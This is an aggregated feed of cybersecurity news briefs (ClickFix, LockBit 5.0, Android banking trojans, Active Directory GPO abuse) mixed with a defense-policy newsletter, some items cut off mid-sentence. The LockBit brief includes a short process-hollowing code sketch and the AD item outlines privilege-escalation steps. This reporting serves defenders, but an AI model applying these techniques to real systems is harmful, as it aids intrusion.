-
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
ClickFix attacks have experienced a dramatic surge over the past year, establishing themselves as a cornerstone of modern social engineering tactics.
These sophisticated attacks manipulate victims into executing malicious code directly on their devices through deceptive copy-and-paste mechanisms.
The threat has evolved beyond traditional email-based phishing, now leveraging multiple delivery channels including poisoned search results and malicious advertising campaigns that bypass conventional security controls.
The latest iteration of ClickFix represents a significant escalation in sophistication. Attackers have developed highly convincing fake verification pages that mimic legitimate services like Cloudflare, complete with embedded instructional videos, countdown timers, and real-time user counters.
These elements work together to create an authentic appearance that pressures victims into completing the verification process without suspicion.
The pages adapt dynamically to the user’s operating system, delivering platform-specific instructions for Windows, Mac, and other systems.
Push Security researchers identified this advanced campaign as the most sophisticated ClickFix variant observed to date.
The attack chain demonstrates remarkable technical complexity, automatically copying malicious code to the victim’s clipboard through JavaScript without requiring manual selection.
According to Microsoft’s 2025 Digital Defense report, ClickFix attacks now account for 47% of all initial access methods, making them the most prevalent entry point for cybercriminals targeting organizations.
The primary delivery mechanism has shifted dramatically away from email. Research shows that four out of five ClickFix pages are accessed through Google Search, either via poisoned search results or malvertising campaigns.
.webp)
Attackers compromise legitimate websites through hosting vulnerabilities or create optimized malicious sites targeting specific search terms.
This non-email delivery approach effectively bypasses traditional anti-phishing controls implemented at the email gateway layer.
Detection evasion techniques employed by ClickFix campaigns include domain rotation to avoid blocklists, bot protection services that prevent automated analysis, and heavily obfuscated page content designed to evade signature-based detection systems.
Because malicious code is copied within the browser sandbox, security tools cannot observe or flag the action before execution, leaving endpoint detection and response systems as the sole remaining defense layer after victims attempt to run the commands.
Advanced Payload Execution and Evasion Mechanisms
The technical execution of ClickFix payloads demonstrates increasing sophistication in abusing legitimate system binaries across operating systems.
.webp)
While mshta and PowerShell remain the predominant attack vectors, threat actors now exploit a diverse array of Living-Off-The-Land Binaries (LOLBINs) targeting different services.
Recent variants employ cache smuggling techniques that combine ClickFix methodology with JavaScript to cache malicious files disguised as JPG images, enabling local execution without external PowerShell web requests.
The attack operates through user-initiated paste events requiring interaction such as button presses before loading the malicious payload, making traditional clipboard blocking measures ineffective.
Security researchers have noted that disabling the Win+R dialog box or restricting File Explorer address bar applications provides limited protection since attackers can leverage alternative legitimate services to execute commands.
The hybrid attack path bridging browser and endpoint environments positions ClickFix to potentially evolve into entirely browser-based attacks that completely evade EDR solutions, representing a concerning future trajectory for this threat vector.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post ClickFix Attacks Evolved With Weaponized Videos That Tricks Users via Self-infection Process appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
A now-patched security flaw in Samsung Galaxy Android devices was exploited as a zero-day to deliver a “commercial-grade” Android spyware dubbed LANDFALL in targeted attacks in the Middle East.
The activity involved the exploitation of CVE-2025-21042 (CVSS score: 8.8), an out-of-bounds write flaw in the “libimagecodec.quram.so” component that could allow remote attackers to execute arbitrary
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
A sophisticated banking trojan named Herodotus has emerged as a significant threat to Android users worldwide.
Operating as Malware-as-a-Service, this malicious application disguises itself as a legitimate tool to trick users into downloading and installing an APK file outside the official Play Store.
Once installed on a device, the trojan gains access to critical system permissions and can execute banking operations directly on behalf of the compromised user.
The threat represents a concerning evolution in mobile malware, particularly because it remains largely invisible to traditional antivirus solutions despite its obvious malicious intent.
The malware spreads primarily through SMS phishing campaigns, with attackers sending deceptive links that direct victims to fraudulent download pages.
Users unknowingly install the APK, granting Herodotus access to sensitive permissions including accessibility features.
Pradeo security analysts identified that the trojan then deploys overlay attacks by displaying fake screens on top of legitimate banking applications, enabling credential theft and session hijacking.
Detection Evasion: The Humanization Technique
Herodotus employs sophisticated evasion tactics specifically designed to bypass modern anti-fraud detection systems.
The malware “humanizes” its malicious actions through deliberate random delays, micro-movements, and realistic typing patterns.
This behavioral approach makes automated detection significantly more challenging.
The trojan captures both screen content and keystroke data, allowing attackers to monitor user activity in real time and perform transactions while the victim remains logged into their banking session.
Pradeo security analysts noted that when they searched for Herodotus samples in a leading antivirus provider’s signature database, the application triggered no alerts whatsoever.
This failure occurred despite the malware being easily identifiable through basic search engine queries. Traditional antivirus solutions typically rely on known signatures and previously observed behavioral patterns.
Herodotus circumvents these defenses because it operates through SMS phishing (an initial access vector), installs from unknown sources, and only triggers dangerous activities after receiving explicit permission approvals from the user.
Effective defense requires detecting multiple indicators of compromise working in sequence: suspicious SMS links, installations from untrusted sources, critical permission requests, and behavioral anomalies including screen overlays and simulated interactions.
Individually, these signals may appear harmless, but their combination reveals an active attack that conventional antivirus protection consistently misses.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post Herodotus Android Banking Malware Takes Full Control Of Device Evading Antivirus appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
Active Directory sites are designed to optimize network performance across geographically separated organizations by managing replication and authentication across multiple locations.
The Synacktiv security researchers have demonstrated that these supposedly safe network management tools can be weaponized to launch powerful attacks against enterprise environments.
The vulnerability emerges because Active Directory sites can be linked to Group Policy Objects (GPOs), which control system configurations across an organization.
When attackers gain write permissions to sites or their associated GPOs, they can inject malicious configurations that compromise all computers connected to those sites, including domain controllers.
This creates a direct pathway to domain-wide compromise without triggering conventional security defenses.
How Privilege Escalation Works
Attackers exploit three primary permission types to accomplish this: GenericAll, GenericWrite, and WriteGPLink permissions on site objects. Even administrators often delegate these permissions without fully understanding the implications.
Once an attacker controls these permissions, they can either poison existing GPOs or create new malicious ones that execute arbitrary commands on connected systems.
These commands can add attacker-controlled accounts to administrator groups, effectively giving them domain admin privileges within minutes. The most dangerous aspect is how Active Directory sites enable lateral movement across entire forests.
The configuration partition containing site information replicates forest-wide, meaning that a compromised domain controller can modify site configurations that affect other domains.
This technique bypasses traditional SID filtering protections that normally prevent such cross-domain attacks.
The Synacktiv researchers demonstrated that attackers from a child domain can compromise the forest root domain by simply linking malicious GPOs to sites that host the root domain’s controllers.
This attack vector represents a significant blind spot in many organizations’ security strategies. It warrants immediate attention from defensive teams managing large Active Directory environments.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post Hackers Can Attack Active Directory Sites to Escalate Privileges and Compromise the Domain appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
·
The United States military says it destroyed another alleged drug-trafficking boat in the waters off Latin America on Thursday. “The vessel was trafficking narcotics in the Caribbean and was struck in international waters. No U.S. forces were harmed in the strike, and three male narco-terrorists—who were aboard the vessel—were killed,” Pentagon chief Pete Hegseth announced on social media, accompanied by a 20-second video of the violence, which legal experts and critics describe as “extrajudicial killings.”
This means the U.S. military has killed more than 60 people in at least 17 strikes, according to information shared by Hegseth and President Trump dating to when these strikes began in early September. (Want more information on each of the prior 16 strikes? Just Security has that covered, here.)
Due process? As we’ve noted before, Hegseth did not provide evidence to support the claim that those in the boat were trafficking drugs, where they were headed, nor—on a more trivial level—how the secretary’s subordinates determined the gender of those on the vessel before the attack.
However, the Associated Press looked into “the identities of four of the men—and pieced together details about at least five others” killed by U.S. troops, reporting Friday from Venezuela. “One was a fisherman struggling to eke out a living on $100 a month. Another was a career criminal. A third was a former military cadet. And a fourth was a down-on-his-luck bus driver.”
“Most of the nine men were crewing such craft for the first or second time, making at least $500 per trip…One was a well-known local crime boss who contracted out his smuggling services to traffickers,” AP’s Regina Garcia Cana writes. “We talked with several people in multiple communities who knew the men at different stages of their lives. We used social media posts and publicly available information to corroborate some of the information,” she said in a brief, separate report about her investigative process.
New: The U.S. military began operating an AC-130J Ghostrider attack plane out of El Salvador in mid-October, the New York Times reported Thursday. “It is operated by the Air Force Special Operations Command, a unit that carries out sensitive missions for the military.”
But that’s not all: “The New York Times also identified a Navy [P-8A Poseidon] reconnaissance plane and a rarely seen, unmarked Air Force [C-40 Clipper] jet at the airport,” located in the Cooperative Security Location Comalapa, a small American military outpost at El Salvador’s main airport. More, here.
Update: When it comes to Venezuela, the White House told Congress it “doesn’t have a legal justification that would support attacks against any land targets right now,” and that “the US is not currently planning to launch strikes inside Venezuela” at the moment, CNN reported Thursday.
Notable: The White House’s legal framework “includes a list of 24 different cartels and criminal organizations based around Latin America it says the administration is authorized to target, according to one of the sources familiar with the document. But the Trump administration is seeking a separate legal opinion from the Justice Department that would provide a justification for launching strikes against land targets without needing to ask Congress to authorize military force,” according to five CNN reporters.
By the way, Senate Republicans on Thursday voted down legislation that would have limited White House attacks inside Venezuela. “The joint resolution, which was introduced by Sen. Tim Kaine (D-Va.) last month, was quelled in a 49-51 Senate vote,” The Hill reports.
Some Republicans wanted to have it both ways: Indiana’s Todd Young voted against the measure, then said afterward that his vote was “not an endorsement of the Administration’s current course in the Caribbean and Eastern Pacific.” North Carolina’s Thom Tillis acted similarly Thursday, voting against the measure, then later telling reporters “he still has doubts about the campaign,” according to AP. Tillis also “pointed out that it was expensive to change the deployment location for an aircraft carrier and questioned whether those funds could be better used at the U.S.-Mexico border to stop fentanyl trafficking.”
Democrats dissent: “You cannot bomb your way out of a drug crisis,” Sen. Jack Reed, D-R.I., told reporters, while Virginia’s Tim Kaine, who co-authored the legislation voted down Thursday, said, “We should not be going to war without a vote of Congress.”
Bigger picture: Why Venezuela? Four writers at The Atlantic took a stab at the question, featuring input from anonymous White House sources and Ryan Berg, an expert on the region who now works at the Center for Strategic and International Studies in Washington. According to Berg, “Trump instinctively understands that if the U.S. is not the top dog in the Western Hemisphere, it can’t be an effective global power.” A senior administration official added, “If the goal is increasingly to have U.S.-aligned leaders, or at a minimum leaders that are not actively aligned with China, Russia, and Iran, then Venezuela sticks out like a sore thumb.”
Trump himself said six years ago in Miami, “When Venezuela is free, and Cuba is free, and Nicaragua is free, this will become the first free hemisphere in all of human history.”
Also notable: “Trump has a history of deploying deception in his dealings with foreign adversaries,” the four reporters caution, and note that “In June, the White House announced that he would give Tehran two additional weeks to engage in diplomacy about its nuclear program; three days later, Trump sent warplanes far into Iranian airspace to bomb atomic facilities. He may be employing a similar tactic with Venezuela.” Continue reading, here.
Welcome to this Friday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson with Thomas Novelly and Bradley Peniston. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1983, NATO began its large-scale Able Archer 83 exercises, which the Soviets interpreted as possible opening moves in a nuclear war with the alliance.
Around the Defense Department
Today, 2 pm ET: Hegseth’s “Arsenal of Freedom” speech at the National Defense University. A Pentagon press release said it would be livestreamed at war.gov, but as of press time, the “Live Events” page had nothing scheduled. Defense One’s Lauren C. Williams is heading to NDU to cover it; look for her story later today.
ICYMI: Experts, officials, industry reacted to a six-page draft of a memo expected to be released after the speech. And here’s a draft list of industry CEOs slated to attend.
Related: Defense tech companies will weather the shutdown. But what happens next? “From DOGE’s initial descent to the longest government shutdown in U.S. history, defense contractors are weathering policy changes at different rates during the first leg of the second Trump administration. But while larger companies are thriving, smaller companies—the very ones the White House and Pentagon want to court—have a bumpier ride,” Williams reports off recent earning calls and more.
Commentary: As it seeks to improve acquisition, the Pentagon should do more with MOSA—that is, modular open systems architecture. “The law already requires MOSA to be used in major warfighting programs ‘to the maximum extent practicable’ and Secretary Hegseth’s own Systems Engineering and Architecture office has been pushing the approach since February,” writes Andy Green, who leads the Mission Systems division of HII, the nation’s largest warship builder. “It is direction that, if enforced, could do more to speed acquisitions and cut costs than any process reform under consideration.” Read his argument, here.
Pentagon policy shop shifts story on pause in Ukraine aid again. “A senior advisor and former deputy to the Pentagon’s undersecretary for policy told senators on Thursday that his office ‘neither ordered nor even recommended a pause to any weapons shipments to Ukraine’ over the summer, contrary to the press reporting from the time, but also in contrast to testimony from his colleague on Tuesday and statements from the Pentagon on July 2,” writes Defense One’s Meghann Myers, here.
ICMYI: It’s been a rough week for would-be Pentagon policymakers on the Hill. On Tuesday, Sen. Tom Cotton, R-Ark., said the office was producing a “Pigpen-like mess.”
Developing: A federal judge is set to rule later today on Trump's order to send National Guard troops to Portland, Oregon, which the president has claimed is a “war-ravaged” city due to persistent but largely peaceful protests outside an immigration detention facility at the southern end of the city.
Why it matters: The judge’s decision “could be the first to permanently block Trump from using troops to quell protests against federal immigration authorities, which he is also attempting to do in Democrat-led Los Angeles, Chicago and Washington D.C.,” Reuters reports, and notes, “The case could ultimately go to the U.S. Supreme Court.”
For a bit more background on the case, Oregon Public Broadcasting has this from Sunday.
Update: The cost to dispatch about 200 Texas Guard troops to Chicago (against the wishes of state officials) could rise above $12 million by December, the San Antonio Express-News reported Thursday. Even though the Texas soldiers are already staged in Illinois, “a court order issued nearly a month ago has blocked them from deploying to the streets or guarding a Chicago-area immigration facility,” the Express-News reminds readers. “In the meantime, [Northern Command officials say] the troops are training on deescalation, crowd control and use-of-force rules.”
Related: “Michigan National Guard chief: No troops needed in Detroit.”
Newly confirmed Air Force Chief of Staff Gen. Kenneth Wilsbach is getting the band back together. The four-star general has selected Chief Master Sgt. David Wolfe as the service's next top-enlisted leader, Defense One’s Thomas Novelly reports. Previously, Wolfe was Wilsbach's top enlisted advisor when the general led Air Combat Command.
Wolfe takes over the role from Chief Master Sgt. David Flosi, who announced his retirement last month following the death of his wife Katy. The service's new top enlisted leader began his military career in 1992 with a background in missile security, elite guard duty, protective services, and space warning security. In an August press release, Wolfe also detailed he received non-judicial punishment early in his Air Force career.
“I didn't exactly start my Air Force career on the right foot,” Wolfe said in the news release. “An Article 15 and a stint in correctional custody made it clear I needed to change course. It was a rough start, but it turned out to be exactly what I needed.”
Space Force astronauts? “Today, guardians go to space only in popular misconception, but tomorrow? There might be solid tactical reasons to put Space Force personnel in orbit, argues a new report from the Mitchell Institute for Aerospace Studies, writes Defense One’s Thomas Novelly, here.
Additional reading:
- “Multiple people at Joint Base Andrews fall ill after suspicious package delivered with white powder, sources say,” CNN reported Thursday;
- Corruption watch: “Trump Wines Sold At Coast Guard Stores On Federal Property,” Forbes reported Thursday;
- “Army seeks high-energy laser systems to kill drone swarms,” Military Times reported Thursday;
- “New Pentagon Press Crew Is All In on Trump,” the New York Times reported Tuesday;
- And “US judge approves Trump administration's decision to drop Boeing criminal case,” Reuters reported Friday.
Around the world
At the president’s order, the Pentagon is drawing up plans for war in Nigeria even though military officials told the New York Times this week “U.S. forces are unlikely to be able to end a decades-long insurgency that has claimed lives across sectarian lines in Africa’s most populous country.”
Courses of action with the presumed highest likelihood of success include drone strikes “on the few known compounds in northern Nigeria inhabited by militant groups” and joint operations “with Nigerian soldiers to raid…rural hamlets in the country’s north,” Helene Cooper reported Wednesday.
A third and more serious option involves “mov[ing] an aircraft carrier group into the Gulf of Guinea” for a campaign of “strikes deep in northern Nigeria” using fighter jets and long-range bombers. Continue reading, here.
From the region: “Russia could buy leftover uranium from Niger, France warns,” Semafor reported Friday.
And lastly this week: China’s third aircraft carrier just entered service during a ceremony at Yulin Naval Base on Wednesday. However, “security analysts and regional diplomats say tough challenges lie ahead before it can be made fully operational,” Reuters reported Friday from Hong Kong.
It’s an 80,000-ton, diesel-fueled carrier named CS Fujian, and it “brings catapult-launch capabilities to Chinese naval aviation,” USNI News explains. “The first two PLAN carriers, CS Liaoning (016) and Shandong (017), used Russian-styled short take-off but arrested recovery (STOBAR) designs. [But now] With the vessel’s three electromagnetic catapults, Chinese forces can sortie fighter jets with heavier payloads and larger aircraft—including the new KJ-600 airborne early warning and command aircraft.”
In recent sea trials, “the Chinese navy launched its new carrier version of the J-35 stealth fighter and an early-warning aircraft, the KJ-600, as well as a variant of its established J-15 fighter,” Reuters reports.
Expert reax: “Despite nine sea trials this year, they are working with almost entirely new platforms top to bottom,” which is why “I think it will be at least another year before it reaches full operational capability,” said Ben Lewis, of the open-source data platform PLATracker.
]]>¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
A China-linked threat actor has been attributed to a cyber attack targeting an U.S. non-profit organization with an aim to establish long-term persistence, as part of broader activity aimed at U.S. entities that are linked to or involved in policy issues.
The organization, according to a report from Broadcom’s Symantec and Carbon Black teams, is “active in attempting to influence U.S. government
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
LockBit 5.0 made its debut in late September 2025, marking a significant upgrade for one of the most notorious ransomware-as-a-service (RaaS) groups.
With roots tracing back to the ABCD ransomware in 2019, LockBit rapidly grew in sophistication, consistently updating its tactics despite facing aggressive law enforcement efforts and affiliate panel leaks.
The latest version is built on the existing v4.0 codebase, yet it introduces new methods designed to maximize evasion and destructive impact across diverse organizational networks.
FlashPoint security analysts identified LockBit 5.0’s uniquely modular architecture as a notable innovation in the ransomware’s ongoing evolution.
Their detailed technical analysis highlights how this malware continues to threaten critical infrastructure by leveraging advanced execution and obfuscation strategies.
Large-scale attacks have been observed targeting industries irrespective of their geographic and operational boundaries, ensuring LockBit’s continued reputation for stealth and resilience.
One standout advancement in LockBit 5.0 is its two-stage execution model, which expertly divides the infection process into loader and payload phases.
The initial stage involves a stealthy loader built for persistence and anti-analysis, employing control flow obfuscation to dynamically calculate execution paths and complicate reverse engineering.
The loader dynamically resolves API calls using a hashing algorithm, then reloads fresh copies of core libraries—such as NTDLL and Kernel32—effectively bypassing hooks placed by security tools.
.webp)
After creating a suspended instance of defrag.exe, it injects the decrypted payload through process hollowing, updating the instruction pointer with ZwWriteProcessMemory and resuming execution in memory, all while evading standard detection mechanisms.
// Process hollowing code snippet excerpt
HANDLE hProcess = CreateProcess("defrag.exe", ...);
ZwWriteProcessMemory(hProcess, ...); // Inject LockBit payload
ResumeThread(hProcess);This technical breakdown demonstrates LockBit’s commitment to maximizing operational stealth and survivability.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post New Analysis Uncovers LockBit 5.0 Key Capabilities and Two-Stage Execution Model appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
Russian-based threat actors are distributing a sophisticated Android Remote Access Trojan through underground channels, offering it as a subscription service to other criminals.
The malware, identified as Fantasy Hub, enables attackers to conduct widespread surveillance operations on compromised mobile devices, stealing sensitive communications and personal information from unsuspecting users.
The spyware’s capabilities extend far beyond basic data theft, providing attackers with tools to intercept two-factor authentication messages, access banking credentials, and perform real-time device monitoring.
Fantasy Hub operates under a Malware-as-a-Service model, significantly lowering the technical barriers for attackers with minimal expertise.
Threat actors advertise the malware on Russian-language channels and include links to a Telegram bot that manages subscriptions and provides access to the malware builder.
.webp)
The attackers refer to compromised devices and their owners as “mammoths,” drawing users into a sophisticated social engineering ecosystem that combines phishing techniques with technical sophistication.
Attackers receive complete documentation, including video tutorials, on deploying the malware and bypassing security restrictions.
Zimperium security researchers identified Fantasy Hub’s sophisticated infrastructure, which includes a Russian-language command and control panel and comprehensive operational guides for attackers.
The malware’s targeting strategy specifically focuses on financial institutions such as Alfa, PSB, Tbank, and Sber, where operators deploy fake login windows to capture banking credentials.
This financial focus underscores the serious threat posed to enterprise environments where employees use mobile banking or sensitive applications on personal devices.
Technical Evasion Mechanisms
Fantasy Hub employs advanced detection evasion tactics to remain hidden from security analysis.
The malware utilizes a native dropper embedded within a metamask_loader library that decrypts an encrypted asset called metadata.dat during runtime.
.webp)
The decryption process relies on a custom XOR encryption routine using a fixed 36-byte key pattern, followed by gzip decompression through zlib.
This two-stage encryption approach significantly reduces static indicators that traditional antivirus solutions might detect.
The malware further leverages the SMS handler role abuse technique, similar to ClayRat spyware, consolidating multiple powerful permissions including contacts, camera, and file access into a single authorization step.
The dropper masquerades as a Google Play Update to lower user suspicion, while recent samples demonstrate root detection capabilities to evade dynamic analysis environments.
Additionally, Fantasy Hub integrates WebRTC for establishing live audio and video streaming channels, enabling real-time surveillance capabilities that significantly expand the attacker’s reconnaissance potential beyond traditional data exfiltration methods.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post New Android Malware ‘Fantasy Hub’ Intercepts SMS Messages, Contacts and Call Logs appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
Microsoft’s upcoming Teams update, set for targeted releases in early November 2025 and worldwide by January 2026, will allow users to initiate chats with only an email address, even if the recipient isn’t a Teams user. This feature raises security concerns among experts.
The invitee joins as a guest via email, enabling seamless external communication across Android, desktop, iOS, Linux, and Mac. While aimed at flexible work, this default-enabled feature widens the door for phishing scams and malware infiltration, potentially leaking sensitive data in the process.
The core issue lies in the feature’s broad accessibility. By allowing chats with external email addresses without prior validation, Teams creates an enlarged attack vector.
Phishing actors could spoof legitimate invites, tricking users into clicking malicious links or sharing credentials. For instance, a fake “chat request” from a supposed business partner might embed malware payloads, exploiting the guest join process to deliver ransomware or spyware directly into organizational chats.
Security researchers warn that this mirrors tactics seen in OAuth phishing campaigns, where attackers impersonate trusted services to harvest data.
With chats governed by Entra B2B Guest policies but still confined to the organization’s boundary, the risk of inadvertent data exposure grows.
Microsoft Teams’ New “Chat with Anyone” Feature
Employees might unknowingly disclose proprietary information to impostors, leading to intellectual property theft or compliance violations under regulations such as GDPR.
In practice, this could amplify threats in hybrid work environments. Consider a sales team chatting with a “prospective client” via email invite; if the contact is compromised, attackers gain a foothold to eavesdrop or escalate privileges.
Malware distribution becomes simpler, too, as guests could inadvertently forward infected files, bypassing traditional email filters, since interactions occur within Teams’ ecosystem.
Microsoft acknowledges the change affects all users and urges organizations to update documentation and train support teams. However, the default activation means many firms could overlook it until incidents occur, echoing past oversights like the SolarWinds breach, where unpatched features fueled widespread compromise.
Admins aren’t powerless. To disable the feature, they can use PowerShell to set the UseB2BInvitesToAddExternalUsers attribute in TeamsMessagingPolicy to false, effectively blocking external email-based chats.
This simple tweak restores tighter controls, limiting invites to verified B2B connections. Experts recommend combining it with multi-factor authentication enforcement, regular policy audits, and user awareness training to counter phishing attempts.
As Teams evolves, balancing innovation with security remains crucial. This rollout underscores the need for proactive defense in collaborative tools, lest convenience become a cybercriminal’s gateway.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post Microsoft Teams’ New “Chat with Anyone” Feature Exposes Users to Phishing and Malware Attacks appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶